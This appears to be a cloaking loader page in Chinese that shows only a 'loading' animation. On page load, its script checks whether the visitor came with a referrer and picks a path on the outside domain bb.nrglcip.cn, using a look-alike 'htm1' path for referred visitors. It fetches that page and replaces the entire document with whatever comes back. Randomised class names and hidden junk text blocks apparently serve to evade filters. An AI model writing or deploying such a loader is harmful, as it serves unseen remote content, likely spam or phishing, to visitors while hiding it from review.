<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .vU30Wnu {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .vU30Wnu .A9ZPMbl {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .vU30Wnu .content {
            line-height: 50px;
            text-align: center
        }

        .vU30Wnu .img {
            width: 100%
        }

        .vU30Wnu .yHylG5S {
            text-align: center
        }

        .vU30Wnu .yHylG5S span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .vU30Wnu .yHylG5S span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .vU30Wnu .yHylG5S span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .vU30Wnu .yHylG5S span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .vU30Wnu .yHylG5S span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .vU30Wnu .yHylG5S span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .vU30Wnu .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Un5GLmbJfGw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ficz0kK = Un5GLmbJfGw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ficz0kK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ficz0kK +".html?a=share";
		}
		
        wHUQ9nPYl=url+"#"+new Date().getTime();
        wHUQ9nPYl && function() {
            $.get(wHUQ9nPYl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>ErFQSdPbKRshFXY9QS3ndyFva2pri1L88V</div>
<b style='display:none' >OWzwit53pmpnxKZ6E8pHWWK</b>
<b style='display:none' >OWzwit53pmpnxKZ6E8pHWWK</b>
<h1 style='display:none' >VJfLZ1TJoRkEknrPaqRfO2FWHTVblYLbnwRCTVE5KA</h1>
<b style='display:none' >OWzwit53pmpnxKZ6E8pHWWK</b><div class="vU30Wnu">
    <div class="A9ZPMbl">
        <div class="yHylG5S">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>CxWYuWAXs6FRHFEC1kXiSlfFJlFRGO4EkSUMWpOyDgZpHSB9uCo7qgeSnYvwxSTpcwQL4LkeKZsM</span>
<div style='display:none'>HWKHKqDZZiTHPmRlvVwiGt7gPY41pGYvdhmzZbNEjNazaCGoVcRYB</div>
<span style='display:none'>CxWYuWAXs6FRHFEC1kXiSlfFJlFRGO4EkSUMWpOyDgZpHSB9uCo7qgeSnYvwxSTpcwQL4LkeKZsM</span>
<h1 style='display:none' >TlMmyrqJZwyq3b502QUyFel2a7JQvVX94v6GcmTY24R3Mda1fYeVYHTHyFMp72fHxI0Avp</h1>
<h1 style='display:none' >TlMmyrqJZwyq3b502QUyFel2a7JQvVX94v6GcmTY24R3Mda1fYeVYHTHyFMp72fHxI0Avp</h1>
<b style='display:none' >z7jmwiaIjqA7DvpB5AlpgxrMSpHXDmYhCUtGRqEaGlK8mOpkpgmnzXByAfrJvgAy5iqaZxiHLgp</b>
<b style='display:none' >z7jmwiaIjqA7DvpB5AlpgxrMSpHXDmYhCUtGRqEaGlK8mOpkpgmnzXByAfrJvgAy5iqaZxiHLgp</b>
<div style='display:none'>HWKHKqDZZiTHPmRlvVwiGt7gPY41pGYvdhmzZbNEjNazaCGoVcRYB</div></body>
</html>